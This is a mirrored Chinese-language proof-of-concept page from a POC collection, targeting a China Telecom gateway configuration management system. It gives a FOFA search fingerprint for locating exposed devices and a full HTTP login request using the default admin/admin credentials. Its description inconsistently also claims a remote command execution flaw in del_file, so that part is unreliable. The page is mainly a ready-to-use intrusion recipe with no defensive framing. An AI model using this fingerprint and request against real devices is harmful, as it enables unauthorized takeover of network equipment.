mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
37 lines
2.0 KiB
Markdown
37 lines
2.0 KiB
Markdown
|
|
# 电信网关配置管理系统存在弱口令漏洞
|
|||
|
|
|
|||
|
|
**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">
|
|||
|
|
</font><font style="color:rgba(0, 0, 0, 0.9);">中国电信集团有限公司(英文名称“China Telecom”、简称“中国电信”)成立于2000年9月,是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统del_file存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。</font><font style="color:rgb(38, 38, 38);">
|
|||
|
|
</font>**<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">
|
|||
|
|
</font><font style="color:rgb(38, 38, 38);">●电信网关配置管理系统
|
|||
|
|
</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**<font style="color:rgb(38, 38, 38);">
|
|||
|
|
</font><font style="color:rgb(38, 38, 38);">●fofabody="src=\"img/dl.gif\"" && title="系统登录"
|
|||
|
|
●特征</font>
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
<font style="color:rgb(38, 38, 38);">
|
|||
|
|
</font>**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**
|
|||
|
|
|
|||
|
|
```yaml
|
|||
|
|
POST /manager/login.php HTTP/1.1
|
|||
|
|
Host:
|
|||
|
|
Upgrade-Insecure-Requests: 1
|
|||
|
|
Content-Type: application/x-www-form-urlencoded
|
|||
|
|
Cookie: PHPSESSID=tskslsm160gbfc5o8uskotr8i3
|
|||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|||
|
|
Cache-Control: max-age=0
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
|
|||
|
|
Accept-Encoding: gzip, deflate
|
|||
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|||
|
|
Content-Length: 21
|
|||
|
|
|
|||
|
|
Name=admin&Pass=admin
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-05-14 11:22:11
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tskidd2bz9yqeir3>
|